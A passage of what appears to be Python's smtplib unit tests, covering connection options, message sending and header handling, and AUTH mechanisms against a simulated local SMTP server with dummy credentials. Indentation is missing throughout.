self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=3, source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
